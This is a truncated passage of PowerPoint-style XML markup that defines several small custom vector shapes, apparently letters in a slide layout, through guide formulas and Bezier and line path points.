                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="2"/>
                        <a:pt x="4" y="2"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="5"/>
                        <a:pt x="3" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="5"/>
                        <a:pt x="3" y="6"/>
                        <a:pt x="4" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="6"/>
                        <a:pt x="5" y="7"/>
                        <a:pt x="6" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="9"/>
                        <a:pt x="8" y="9"/>
                        <a:pt x="9" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="11"/>
                        <a:pt x="9" y="12"/>
                        <a:pt x="9" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="14"/>
                        <a:pt x="9" y="15"/>
                        <a:pt x="8" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="17"/>
                        <a:pt x="6" y="17"/>
                        <a:pt x="5" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="17"/>
                        <a:pt x="3" y="17"/>
                        <a:pt x="2" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="16"/>
                        <a:pt x="1" y="15"/>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Rectangle 266"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9663113" y="4559301"/>
                  <a:ext cx="31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67"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9675813" y="4559301"/>
                  <a:ext cx="26988" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17"/>
                    <a:gd name="T1" fmla="*/ 24 h 24"/>
                    <a:gd name="T2" fmla="*/ 0 w 17"/>
                    <a:gd name="T3" fmla="*/ 0 h 24"/>
                    <a:gd name="T4" fmla="*/ 0 w 17"/>
                    <a:gd name="T5" fmla="*/ 0 h 24"/>
                    <a:gd name="T6" fmla="*/ 16 w 17"/>
                    <a:gd name="T7" fmla="*/ 18 h 24"/>
                    <a:gd name="T8" fmla="*/ 16 w 17"/>
                    <a:gd name="T9" fmla="*/ 0 h 24"/>
                    <a:gd name="T10" fmla="*/ 17 w 17"/>
                    <a:gd name="T11" fmla="*/ 0 h 24"/>
                    <a:gd name="T12" fmla="*/ 17 w 17"/>
                    <a:gd name="T13" fmla="*/ 24 h 24"/>
                    <a:gd name="T14" fmla="*/ 17 w 17"/>
                    <a:gd name="T15" fmla="*/ 24 h 24"/>
                    <a:gd name="T16" fmla="*/ 3 w 17"/>
                    <a:gd name="T17" fmla="*/ 5 h 24"/>
                    <a:gd name="T18" fmla="*/ 3 w 17"/>
                    <a:gd name="T19" fmla="*/ 24 h 24"/>
                    <a:gd name="T20" fmla="*/ 0 w 17"/>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4">
                      <a:moveTo>
                        <a:pt x="0" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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268"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9712325" y="4557713"/>
                  <a:ext cx="39688" cy="39688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 16 w 17"/>
                    <a:gd name="T1" fmla="*/ 3 h 17"/>
                    <a:gd name="T2" fmla="*/ 15 w 17"/>
                    <a:gd name="T3" fmla="*/ 4 h 17"/>
                    <a:gd name="T4" fmla="*/ 12 w 17"/>
                    <a:gd name="T5" fmla="*/ 2 h 17"/>
                    <a:gd name="T6" fmla="*/ 9 w 17"/>
                    <a:gd name="T7" fmla="*/ 2 h 17"/>
                    <a:gd name="T8" fmla="*/ 5 w 17"/>
                    <a:gd name="T9" fmla="*/ 3 h 17"/>
                    <a:gd name="T10" fmla="*/ 2 w 17"/>
                    <a:gd name="T11" fmla="*/ 5 h 17"/>
                    <a:gd name="T12" fmla="*/ 1 w 17"/>
                    <a:gd name="T13" fmla="*/ 9 h 17"/>
                    <a:gd name="T14" fmla="*/ 2 w 17"/>
                    <a:gd name="T15" fmla="*/ 12 h 17"/>
                    <a:gd name="T16" fmla="*/ 5 w 17"/>
                    <a:gd name="T17" fmla="*/ 15 h 17"/>
                    <a:gd name="T18" fmla="*/ 9 w 17"/>
                    <a:gd name="T19" fmla="*/ 15 h 17"/>
                    <a:gd name="T20" fmla="*/ 13 w 17"/>
                    <a:gd name="T21" fmla="*/ 14 h 17"/>
                    <a:gd name="T22" fmla="*/ 15 w 17"/>
                    <a:gd name="T23" fmla="*/ 10 h 17"/>
                    <a:gd name="T24" fmla="*/ 10 w 17"/>
                    <a:gd name="T25" fmla="*/ 10 h 17"/>
                    <a:gd name="T26" fmla="*/ 10 w 17"/>
                    <a:gd name="T27" fmla="*/ 9 h 17"/>
                    <a:gd name="T28" fmla="*/ 17 w 17"/>
                    <a:gd name="T29" fmla="*/ 9 h 17"/>
                    <a:gd name="T30" fmla="*/ 15 w 17"/>
                    <a:gd name="T31" fmla="*/ 15 h 17"/>
                    <a:gd name="T32" fmla="*/ 9 w 17"/>
                    <a:gd name="T33" fmla="*/ 17 h 17"/>
                    <a:gd name="T34" fmla="*/ 2 w 17"/>
                    <a:gd name="T35" fmla="*/ 14 h 17"/>
                    <a:gd name="T36" fmla="*/ 0 w 17"/>
                    <a:gd name="T37" fmla="*/ 9 h 17"/>
                    <a:gd name="T38" fmla="*/ 1 w 17"/>
                    <a:gd name="T39" fmla="*/ 4 h 17"/>
                    <a:gd name="T40" fmla="*/ 4 w 17"/>
                    <a:gd name="T41" fmla="*/ 1 h 17"/>
                    <a:gd name="T42" fmla="*/ 8 w 17"/>
                    <a:gd name="T43" fmla="*/ 0 h 17"/>
                    <a:gd name="T44" fmla="*/ 12 w 17"/>
                    <a:gd name="T45" fmla="*/ 1 h 17"/>
                    <a:gd name="T46" fmla="*/ 16 w 17"/>
                    <a:gd name="T4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17">
                      <a:moveTo>
                        <a:pt x="16" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="4"/>
                        <a:pt x="15" y="4"/>
                        <a:pt x="15" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="4"/>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="2"/>
                        <a:pt x="10" y="2"/>
                        <a:pt x="9" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="3"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="2" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="10"/>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="13"/>
                        <a:pt x="4" y="14"/>
                        <a:pt x="5" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="15"/>
                        <a:pt x="7" y="15"/>
                        <a:pt x="9" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="15"/>
                        <a:pt x="12" y="15"/>
                        <a:pt x="13" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="13"/>
                        <a:pt x="15" y="12"/>
                        <a:pt x="15" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="10"/>
                        <a:pt x="10" y="10"/>
                        <a:pt x="10" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="9"/>
                        <a:pt x="10" y="9"/>
                        <a:pt x="10" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="9"/>
                        <a:pt x="17" y="9"/>
                        <a:pt x="17" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="11"/>
                        <a:pt x="16" y="13"/>
                        <a:pt x="15" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="16"/>
                        <a:pt x="11" y="17"/>
                        <a:pt x="9" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="17"/>
                        <a:pt x="3" y="16"/>
                        <a:pt x="2" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="6"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="3"/>
                        <a:pt x="3" y="2"/>
                        <a:pt x="4" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="1"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="0"/>
                        <a:pt x="11" y="0"/>
                        <a:pt x="12" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="1"/>
                        <a:pt x="15" y="2"/>
                        <a:pt x="1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269"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9302750" y="4492626"/>
                  <a:ext cx="34925" cy="39688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 15 w 15"/>
                    <a:gd name="T1" fmla="*/ 3 h 17"/>
                    <a:gd name="T2" fmla="*/ 14 w 15"/>
                    <a:gd name="T3" fmla="*/ 4 h 17"/>
                    <a:gd name="T4" fmla="*/ 12 w 15"/>
                    <a:gd name="T5" fmla="*/ 2 h 17"/>
                    <a:gd name="T6" fmla="*/ 8 w 15"/>
                    <a:gd name="T7" fmla="*/ 1 h 17"/>
                    <a:gd name="T8" fmla="*/ 5 w 15"/>
                    <a:gd name="T9" fmla="*/ 2 h 17"/>
                    <a:gd name="T10" fmla="*/ 2 w 15"/>
                    <a:gd name="T11" fmla="*/ 5 h 17"/>
                    <a:gd name="T12" fmla="*/ 1 w 15"/>
                    <a:gd name="T13" fmla="*/ 8 h 17"/>
                    <a:gd name="T14" fmla="*/ 3 w 15"/>
                    <a:gd name="T15" fmla="*/ 13 h 17"/>
                    <a:gd name="T16" fmla="*/ 9 w 15"/>
                    <a:gd name="T17" fmla="*/ 15 h 17"/>
                    <a:gd name="T18" fmla="*/ 14 w 15"/>
                    <a:gd name="T19" fmla="*/ 13 h 17"/>
                    <a:gd name="T20" fmla="*/ 15 w 15"/>
                    <a:gd name="T21" fmla="*/ 14 h 17"/>
                    <a:gd name="T22" fmla="*/ 12 w 15"/>
                    <a:gd name="T23" fmla="*/ 16 h 17"/>
                    <a:gd name="T24" fmla="*/ 8 w 15"/>
                    <a:gd name="T25" fmla="*/ 17 h 17"/>
                    <a:gd name="T26" fmla="*/ 2 w 15"/>
                    <a:gd name="T27" fmla="*/ 14 h 17"/>
                    <a:gd name="T28" fmla="*/ 0 w 15"/>
                    <a:gd name="T29" fmla="*/ 8 h 17"/>
                    <a:gd name="T30" fmla="*/ 2 w 15"/>
                    <a:gd name="T31" fmla="*/ 2 h 17"/>
                    <a:gd name="T32" fmla="*/ 8 w 15"/>
                    <a:gd name="T33" fmla="*/ 0 h 17"/>
                    <a:gd name="T34" fmla="*/ 12 w 15"/>
                    <a:gd name="T35" fmla="*/ 1 h 17"/>
                    <a:gd name="T36" fmla="*/ 15 w 15"/>
                    <a:gd name="T3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7">
                      <a:moveTo>
                        <a:pt x="15" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="4"/>
                        <a:pt x="14" y="4"/>
                        <a:pt x="14" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="3"/>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="2"/>
                        <a:pt x="10" y="1"/>
                        <a:pt x="8" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="3"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="2" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="10"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="3" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="7" y="15"/>
                        <a:pt x="9" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="15"/>
                        <a:pt x="13" y="14"/>
                        <a:pt x="14" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="14"/>
                        <a:pt x="15" y="14"/>
                        <a:pt x="15" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="15"/>
                        <a:pt x="14" y="15"/>
                        <a:pt x="12" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="16"/>
                        <a:pt x="10" y="17"/>
                        <a:pt x="8" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="17"/>
                        <a:pt x="3" y="16"/>
                        <a:pt x="2" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="10"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="1" y="4"/>
                        <a:pt x="2" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="8" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="0"/>
                        <a:pt x="11" y="0"/>
                        <a:pt x="12" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="1"/>
                        <a:pt x="15" y="2"/>
                        <a:pt x="1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270"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9345613" y="4492626"/>
                  <a:ext cx="38100" cy="39688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 17"/>
                    <a:gd name="T1" fmla="*/ 0 h 17"/>
                    <a:gd name="T2" fmla="*/ 14 w 17"/>
                    <a:gd name="T3" fmla="*/ 2 h 17"/>
                    <a:gd name="T4" fmla="*/ 17 w 17"/>
                    <a:gd name="T5" fmla="*/ 8 h 17"/>
                    <a:gd name="T6" fmla="*/ 14 w 17"/>
                    <a:gd name="T7" fmla="*/ 14 h 17"/>
                    <a:gd name="T8" fmla="*/ 8 w 17"/>
                    <a:gd name="T9" fmla="*/ 17 h 17"/>
                    <a:gd name="T10" fmla="*/ 2 w 17"/>
                    <a:gd name="T11" fmla="*/ 14 h 17"/>
                    <a:gd name="T12" fmla="*/ 0 w 17"/>
                    <a:gd name="T13" fmla="*/ 8 h 17"/>
                    <a:gd name="T14" fmla="*/ 1 w 17"/>
                    <a:gd name="T15" fmla="*/ 4 h 17"/>
                    <a:gd name="T16" fmla="*/ 4 w 17"/>
                    <a:gd name="T17" fmla="*/ 1 h 17"/>
                    <a:gd name="T18" fmla="*/ 8 w 17"/>
                    <a:gd name="T19" fmla="*/ 0 h 17"/>
                    <a:gd name="T20" fmla="*/ 8 w 17"/>
                    <a:gd name="T21" fmla="*/ 1 h 17"/>
                    <a:gd name="T22" fmla="*/ 5 w 17"/>
                    <a:gd name="T23" fmla="*/ 2 h 17"/>
                    <a:gd name="T24" fmla="*/ 2 w 17"/>
                    <a:gd name="T25" fmla="*/ 5 h 17"/>
                    <a:gd name="T26" fmla="*/ 2 w 17"/>
                    <a:gd name="T27" fmla="*/ 8 h 17"/>
                    <a:gd name="T28" fmla="*/ 4 w 17"/>
                    <a:gd name="T29" fmla="*/ 13 h 17"/>
                    <a:gd name="T30" fmla="*/ 8 w 17"/>
                    <a:gd name="T31" fmla="*/ 15 h 17"/>
                    <a:gd name="T32" fmla="*/ 12 w 17"/>
                    <a:gd name="T33" fmla="*/ 14 h 17"/>
                    <a:gd name="T34" fmla="*/ 14 w 17"/>
                    <a:gd name="T35" fmla="*/ 12 h 17"/>
                    <a:gd name="T36" fmla="*/ 15 w 17"/>
                    <a:gd name="T37" fmla="*/ 8 h 17"/>
                    <a:gd name="T38" fmla="*/ 14 w 17"/>
                    <a:gd name="T39" fmla="*/ 5 h 17"/>
                    <a:gd name="T40" fmla="*/ 12 w 17"/>
                    <a:gd name="T41" fmla="*/ 2 h 17"/>
                    <a:gd name="T42" fmla="*/ 8 w 17"/>
                    <a:gd name="T4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7">
                      <a:moveTo>
                        <a:pt x="8" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="13" y="1"/>
                        <a:pt x="14" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="4"/>
                        <a:pt x="17" y="6"/>
                        <a:pt x="17" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="11"/>
                        <a:pt x="16" y="13"/>
                        <a:pt x="14" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="16"/>
                        <a:pt x="11" y="17"/>
                        <a:pt x="8" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="17"/>
                        <a:pt x="4" y="16"/>
                        <a:pt x="2" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="5"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="3"/>
                        <a:pt x="3" y="2"/>
                        <a:pt x="4" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="0"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="8" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="3"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="2" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="10"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="4" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="14"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="8" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="15"/>
                        <a:pt x="11" y="15"/>
                        <a:pt x="12" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="14"/>
                        <a:pt x="14" y="13"/>
                        <a:pt x="14" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="11"/>
                        <a:pt x="15" y="10"/>
                        <a:pt x="15" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="7"/>
                        <a:pt x="15" y="6"/>
                        <a:pt x="14" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="4"/>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="2"/>
                        <a:pt x="10" y="1"/>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71"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9391650" y="4492626"/>
                  <a:ext cx="31750" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 14"/>
                    <a:gd name="T1" fmla="*/ 16 h 16"/>
                    <a:gd name="T2" fmla="*/ 0 w 14"/>
                    <a:gd name="T3" fmla="*/ 0 h 16"/>
                    <a:gd name="T4" fmla="*/ 3 w 14"/>
                    <a:gd name="T5" fmla="*/ 0 h 16"/>
                    <a:gd name="T6" fmla="*/ 9 w 14"/>
                    <a:gd name="T7" fmla="*/ 1 h 16"/>
                    <a:gd name="T8" fmla="*/ 12 w 14"/>
                    <a:gd name="T9" fmla="*/ 4 h 16"/>
                    <a:gd name="T10" fmla="*/ 14 w 14"/>
                    <a:gd name="T11" fmla="*/ 8 h 16"/>
                    <a:gd name="T12" fmla="*/ 12 w 14"/>
                    <a:gd name="T13" fmla="*/ 13 h 16"/>
                    <a:gd name="T14" fmla="*/ 10 w 14"/>
                    <a:gd name="T15" fmla="*/ 15 h 16"/>
                    <a:gd name="T16" fmla="*/ 5 w 14"/>
                    <a:gd name="T17" fmla="*/ 16 h 16"/>
                    <a:gd name="T18" fmla="*/ 0 w 14"/>
                    <a:gd name="T19" fmla="*/ 16 h 16"/>
                    <a:gd name="T20" fmla="*/ 2 w 14"/>
                    <a:gd name="T21" fmla="*/ 15 h 16"/>
                    <a:gd name="T22" fmla="*/ 3 w 14"/>
                    <a:gd name="T23" fmla="*/ 15 h 16"/>
                    <a:gd name="T24" fmla="*/ 8 w 14"/>
                    <a:gd name="T25" fmla="*/ 14 h 16"/>
                    <a:gd name="T26" fmla="*/ 11 w 14"/>
                    <a:gd name="T27" fmla="*/ 12 h 16"/>
                    <a:gd name="T28" fmla="*/ 12 w 14"/>
                    <a:gd name="T29" fmla="*/ 9 h 16"/>
                    <a:gd name="T30" fmla="*/ 11 w 14"/>
                    <a:gd name="T31" fmla="*/ 5 h 16"/>
                    <a:gd name="T32" fmla="*/ 8 w 14"/>
                    <a:gd name="T33" fmla="*/ 2 h 16"/>
                    <a:gd name="T34" fmla="*/ 3 w 14"/>
                    <a:gd name="T35" fmla="*/ 2 h 16"/>
                    <a:gd name="T36" fmla="*/ 2 w 14"/>
                    <a:gd name="T37" fmla="*/ 2 h 16"/>
                    <a:gd name="T38" fmla="*/ 2 w 14"/>
                    <a:gd name="T3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6">
                      <a:moveTo>
                        <a:pt x="0" y="16"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="9" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="1"/>
                        <a:pt x="11" y="2"/>
                        <a:pt x="12" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="5"/>
                        <a:pt x="14" y="7"/>
                        <a:pt x="14" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="10"/>
                        <a:pt x="13" y="11"/>
                        <a:pt x="12" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="14"/>
                        <a:pt x="11" y="15"/>
                        <a:pt x="10" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="16"/>
                        <a:pt x="7" y="16"/>
                        <a:pt x="5" y="16"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="16"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2" y="15"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="15"/>
                        <a:pt x="3" y="15"/>
                        <a:pt x="3" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="15"/>
                        <a:pt x="7" y="15"/>
                        <a:pt x="8" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="14"/>
                        <a:pt x="10" y="13"/>
                        <a:pt x="11" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="11"/>
                        <a:pt x="12" y="10"/>
                        <a:pt x="12" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="7"/>
                        <a:pt x="12" y="6"/>
                        <a:pt x="11" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="3"/>
                        <a:pt x="9" y="3"/>
                        <a:pt x="8" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="2"/>
                        <a:pt x="5" y="2"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2" y="2"/>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272"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9429750" y="4492626"/>
                  <a:ext cx="22225" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 14"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 14 w 14"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 14 w 14"/>
                    <a:gd name="T5" fmla="*/ 3 h 23"/>
                    <a:gd name="T6" fmla="*/ 2 w 14"/>
                    <a:gd name="T7" fmla="*/ 3 h 23"/>
                    <a:gd name="T8" fmla="*/ 2 w 14"/>
                    <a:gd name="T9" fmla="*/ 10 h 23"/>
                    <a:gd name="T10" fmla="*/ 14 w 14"/>
                    <a:gd name="T11" fmla="*/ 10 h 23"/>
                    <a:gd name="T12" fmla="*/ 14 w 14"/>
